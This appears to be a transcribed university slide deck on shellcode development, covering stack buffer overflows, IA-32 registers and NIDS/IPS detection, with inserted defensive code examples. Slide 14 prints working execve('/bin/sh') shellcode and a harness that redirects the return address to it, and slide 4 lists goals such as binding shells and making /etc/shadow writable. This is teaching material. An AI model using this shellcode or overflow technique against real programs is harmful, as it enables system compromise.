Shellcode Development - Femi Oloyede - Pallavi Murudkar


Upload: kenneth-barber

Post on 18-Jan-2016


Page 1: Shellcode Development -Femi Oloyede -Pallavi Murudkar

Shellcode Development

- Femi Oloyede
- Pallavi Murudkar

Page 2

Agenda

Introduction
What can Shellcode do?
Tools for Shellcode Development
Understanding Shellcode
Developing Shellcode
Methods of Detecting Shellcode

Page 3

Introduction

Shellcode is defined as a set of instructions injected and then executed by an exploited program.

Shellcodes are primarily used to exploit buffer overflows.

The most important task when creating shellcode is to make it small and executable.

Page 4

What can Shellcode do?

Providing access to the attacked system

Spawning /bin/sh [or] cmd.exe (local shell)

Binding a shell to a port (remote shell)

Adding a root/admin user to the system

Chmod()'ing /etc/shadow to be writeable

Page 5

Tools for Shellcode development

Nasm: used to write assembly code

Gdb: GNU debugger, used to analyze core dump files

Objdump: used to disassemble a file

Ktrace: traces all system calls a process is using

Page 6

Next (Femi)

Understanding Shellcode

Developing Shellcode

Methods of Detecting Shellcode

Page 7

Understanding Shellcode

IA-32 machine architecture (instruction set and registers)

Program flow dynamics: process memory organization, and context switching during function calls and interrupt processing.

Shellcode is injected by modifying the return address of a function by way of a stack-based buffer overflow.

Page 8

Machine Architecture

Refer to "IA-32 Intel® Architecture Software Developer's Manual, Volume 1: Basic Architecture".

A large amount of computer software supports the platform, including operating systems such as MS-DOS, Windows, Linux, BSD, Solaris, and Mac OS X.

EBP: Base pointer. Primarily used to hold the address of the current stack frame. Also sometimes used as a general data or address register.

ESI: General register or "source index" for string operations. Also has a one-byte LODS[size] instruction for loading data from memory into the accumulator.

EDI: General register or "destination index" for string operations. Also has a one-byte STOS[size] instruction to write data out of the accumulator.

ESP: Stack pointer. Holds the address of the top of the stack.

EIP: Instruction pointer. Holds the address of the current instruction.

Page 9

Program Flow Dynamics

Process memory layout, from lower to higher memory address:

    Text area
    Initialized and un-initialized data area
    Stack

C code:

    void A(int a, int b, int c) {
        char buffer1[5];
        char buffer2[10];
    }

    int main(void) {
        A(1, 2, 3);
        return 0;
    }

Assembly code (the call in main, followed by the prologue of A):

    pushl $3
    pushl $2
    pushl $1
    call A
    pushl %ebp
    movl %esp,%ebp
    subl $20,%esp

Page 10

Program Flow Dynamics (cont)

Stack frame of A after its prologue, top of stack (lower addresses) first:

    Top of Stack
      buffer2   12 bytes   <- ESP (Stack Pointer) [subl $20, %esp]
      buffer1    8 bytes
      SFP        4 bytes   <- EBP (Base or frame Pointer) [movl %esp, %ebp]; address of previous frame pointer [pushl %ebp]
      RET        4 bytes   address of the 'return 0' instruction of main
      a          4 bytes
      b          4 bytes
      c          4 bytes
    Bottom of Stack

EIP (Instruction Pointer): address of the last instruction in A

Page 11

Stack Based Buffer Overflow

    #include <string.h>

    void A(char *str) {
        char buffer[4];
        strcpy(buffer, str);
    }

    int main(void) {
        char biggerString[] = "AAAAAAAAAAAA";   /* 12 'A's plus the terminating NUL */
        A(biggerString);
        return 0;
    }

Frame of A during the strcpy, top of stack first:

    Top of Stack
      buffer (4)           AAAA
      SFP (4)              AAAA   overwritten
      RET (4)              AAAA   overwritten
      str (charPtr, 4)
    Bottom of Stack

Stack buffer overflow: the 12-byte string overruns the 4-byte buffer and overwrites SFP and RET.
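As an added example, not from the slides: the slide's strcpy-based A() placed beside a bounded replacement that refuses input which would not fit. The names A_unsafe, A_safe and copy_bounded, and the true/false return convention, are my own.

```c
/* Added example (not from the slides): the slide's A() beside a bounded
 * version. A_unsafe, A_safe and copy_bounded are my own names. */
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define BUF_SIZE 4

/* The slide's function: strcpy() copies until it finds a NUL in str, so any
 * argument of BUF_SIZE or more characters writes past buffer into SFP and RET.
 * Kept for comparison only; nothing here calls it. */
void A_unsafe(char *str)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, str);
}

/* Bounded copy: rejects input that does not fit, NUL included, and leaves
 * dst untouched in that case. Returns true on success, false on rejection. */
bool copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;
    /* Measure src without reading further than dst could ever hold. */
    while (len < dst_size && src[len] != '\0') {
        len++;
    }
    if (len >= dst_size) {
        return false;              /* src needs more than dst_size bytes: would overflow */
    }
    memcpy(dst, src, len + 1);     /* len characters plus the terminating NUL */
    return true;
}

/* Hardened A(): same 4-byte local, but the copy can never leave the buffer,
 * and the caller is told when the input was oversized. */
bool A_safe(const char *str)
{
    char buffer[BUF_SIZE];
    return copy_bounded(buffer, sizeof buffer, str);
}
```

A_unsafe is never called; it is there to show the difference. With the frame drawn on this slide, copy_bounded stops at the buffer boundary, so the 12-byte string is rejected instead of reaching SFP and RET. Compiling with the stack protector (gcc -fstack-protector) adds a second line of defence: a canary between the locals and SFP that aborts the process when an overwrite like the one on the slide is detected before the corrupted return address is used.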

Page 12

Developing Shellcode

Finding the vulnerability

Writing the shellcode

Shellcode is a sequence of machine instructions, or opcodes.

To take advantage of the injected code and gain access to the target system, system calls must be used.

On Linux there are two ways of implementing a system call: the lcall7/lcall27 call gates and the 'INT 0x80' software interrupt.

Page 13

Example - Spawning a Shell

Write the C code

Extract the assembly code

Extract the opcodes

Append the function-exit opcodes so the function exits gracefully

Initialize a buffer with the opcodes

    #include <stdio.h>
    #include <unistd.h>

    int main(void) {
        char *name[2];
        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
        return 0;
    }

Page 14

Example - Spawning a Shell (cont.)

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    int main(void) {
        int *retPtr;
        retPtr = (int *)&retPtr + 2;   /* two words up the frame: past SFP to RET */
        (*retPtr) = (int)shellcode;    /* RET now holds the address of the shellcode buffer */
        return 0;
    }

Frame of main, top of stack first:

    Top of Stack
      retPtr (4)   address of this + 2 words
      SFP (4)
      RET (4)      address of the shellcode buffer
    Bottom of Stack

Page 15

Methods for Detecting Shellcode

NIDS (Network Intrusion Detection System) can be used to identify shellcode on the wire using signature databases and protocol analysis methods.

IPS (Intrusion Prevention System) identifies shellcode by running the code in a sandbox/virtualization in order to detect whether the given code is malicious or not.
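As an added example, not part of the slides: a minimal signature matcher of the kind a NIDS applies to packet payloads. Its two patterns are the int 0x80 opcode pair and the "/bin/sh" string, both visible in the shellcode on slide 14; the function names, the bitmask convention and the benign sample payload are my own constructions.

```c
/* Added example (not from the slides): signature matching over a payload,
 * as a NIDS would do. scan_payload/contains and the sample inputs are my own. */
#include <stddef.h>
#include <string.h>

#define SIG_INT80   0x1   /* bytes cd 80: the int 0x80 software interrupt */
#define SIG_BINSH   0x2   /* the "/bin/sh" path passed to execve          */

/* Naive byte-pattern search; memmem() is not portable, so a loop is used. */
static int contains(const unsigned char *hay, size_t hay_len,
                    const unsigned char *needle, size_t needle_len)
{
    if (needle_len == 0 || hay_len < needle_len) return 0;
    for (size_t i = 0; i + needle_len <= hay_len; i++) {
        if (memcmp(hay + i, needle, needle_len) == 0) return 1;
    }
    return 0;
}

/* Returns a bitmask of the signatures found anywhere in the payload. */
int scan_payload(const unsigned char *buf, size_t len)
{
    static const unsigned char int80[] = { 0xcd, 0x80 };
    static const unsigned char binsh[] = "/bin/sh";     /* 7 bytes, NUL excluded below */
    int hits = 0;
    if (contains(buf, len, int80, sizeof int80))      hits |= SIG_INT80;
    if (contains(buf, len, binsh, sizeof binsh - 1))  hits |= SIG_BINSH;
    return hits;
}

/* The shellcode bytes from slide 14, copied here only as scanner input. */
static const unsigned char slide_shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* A constructed benign payload for comparison. */
static const unsigned char benign_payload[] =
    "GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n";

int scan_slide_shellcode(void)
{
    return scan_payload(slide_shellcode, sizeof slide_shellcode - 1);
}

int scan_benign(void)
{
    return scan_payload(benign_payload, sizeof benign_payload - 1);
}
```

Signature matching is cheap but brittle in both directions: the byte pair cd 80 also occurs in ordinary binary data, so a bare two-byte pattern is prone to false positives, and an encoder that rewrites the payload and decodes it at run time leaves none of these bytes on the wire, which is the gap the sandbox-based IPS approach on this slide is meant to cover.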

Page 16

Conclusion

Shellcode is a powerful mechanism for the exploitation of software vulnerabilities.

It is important that the shellcode developed is small in size.

Shellcode can be employed to automate software security tests, where the shellcode is written to expose and draw attention to security holes.

Page 17

Questions?